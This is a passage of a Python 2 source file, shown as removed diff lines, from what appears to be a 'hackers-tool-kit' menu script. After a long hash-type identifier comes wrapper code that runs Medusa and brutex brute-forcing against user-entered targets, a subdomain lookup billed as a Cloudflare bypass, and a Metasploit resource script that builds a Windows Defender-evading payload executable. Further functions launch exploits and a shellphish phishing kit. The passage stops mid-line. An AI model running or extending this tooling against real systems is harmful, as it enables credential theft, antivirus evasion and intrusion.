jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat 